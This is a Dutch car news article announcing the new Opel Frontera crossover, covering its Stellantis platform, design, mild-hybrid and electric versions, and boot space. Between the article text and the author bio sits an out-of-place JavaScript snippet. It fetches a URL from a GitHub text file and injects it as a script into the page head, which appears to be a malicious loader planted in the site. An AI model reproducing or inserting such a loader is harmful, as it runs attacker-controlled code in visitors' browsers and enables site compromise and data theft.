Gepubliceerd op 9 April 2024 om 07h48
Door Kevin Kersemans

Nieuwe Opel Frontera laat zich zien

Opel heeft de eerste info en beelden vrijgegeven van de Frontera. Dat is geen terreinwagen zoals het gelijknamige model uit de jaren ’90, maar een compacte cross-over die de Crossland opvolgt. De nieuwkomer zal ook te krijgen zijn als EV.

||||||||
|||||||| © ||||||||

Het is een trend om nostalgische modelnamen opnieuw van onder het stof te halen en ze op een nieuw cross-overmodel te plakken. Ford heeft het al gedaan met de Puma en zal het binnenkort nog eens doen door opnieuw een Capri uit te brengen. En Opel doet vrolijk mee, want een belangrijke concurrent van die Capri wordt net als in de jaren ’70 de Manta.

Maar eerst is er de Opel Frontera, vernoemd naar de terreinwagen uit de jaren ’90 die in feite gebaseerd was op een Isuzu. De Frontera van de eenentwintigste eeuw zal echter wat minder ruig zijn dan die naamgenoot. Het gaat deze keer meer om een trendy cross-over die niet bedoeld is om mee door de modder te ploeteren – van vierwielaandrijving is bijvoorbeeld hoegenaamd geen sprake.

Stellantis-basis met Opel-sausje

De exacte afmetingen geeft de constructeur nog niet vrij, maar binnen het Opel-gamma zal de nieuwe Frontera zich positioneren tussen de kleine Mokka en de Grandland, wat hem de facto de opvolger van de Crossland maakt. De nieuwkomer rust op het Smart Car-platform van de Stellantis-groep waar Opel deel van uitmaakt.

Qua design volgt hij echter mooi de recente stijl van het merk uit Rüsselsheim. De meest voor de hand liggende kenmerken daarvan zijn het zwarte paneel tussen de koplampen (de Opel Vizor) en binnenin de Pure Panel-cockpit met twee schermen van 10 duim.

Mildhybride of elektrisch

Technische kenmerken heeft Opel nog niet onthuld. Alleen dat de Frontera zowel besteld zal kunnen worden met een benzinemotor ondersteund door een mildhybridesysteem op 48 volt als met een volledig elektrische aandrijving. In het eerste geval zal het dan logischerwijs om de driecilinder 1.2 PureTech gaan, maar welke motor en batterij de EV-uitvoering zal gebruiken, daar hebben we voorlopig het raden naar.

Zo zou het kunnen gaan om de elektromotor van 113 pk en de batterij van 44 kWh uit de recente Citroën ë-C3, maar ook (en waarschijnlijker) om de motor van 136 of 156 pk in combinatie met een batterij van 50 of 54 kWh uit andere modellen van de groep, zoals de Opel Mokka Electric, de Fiat 600e of de Peugeot e-2008. Of misschien zal er zelfs keuze zijn?

Verder belooft de Frontera een interieur met ergonomische voorstoelen en verschillende slimme opbergmogelijkheden. Het volume van de koffer is al wel bekend: een flinke 460 liter, en met de achterbank neergeklapt zelfs 1.600 liter. En als optie kan het model worden besteld met dakrails die een last van meer dan 200 kilo kunnen dragen. Voor meer info is het wachten tot dichter bij de eigenlijke lancering van het model.

(var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

Kevin Kersemans

Kevin Kersemans, redacteur van dit artikel

Kevin Kersemans is autojournalist met al enkele decennia ervaring op de teller. Zijn passie voor auto's en alles op wielen heeft hij al van kindsbeen af. Voor link2fleet volgt hij vooral de auto-actualiteit en test hij nieuwe modellen.
Dit artikel gaat over: Voertuigen

Gelijkaardige artikels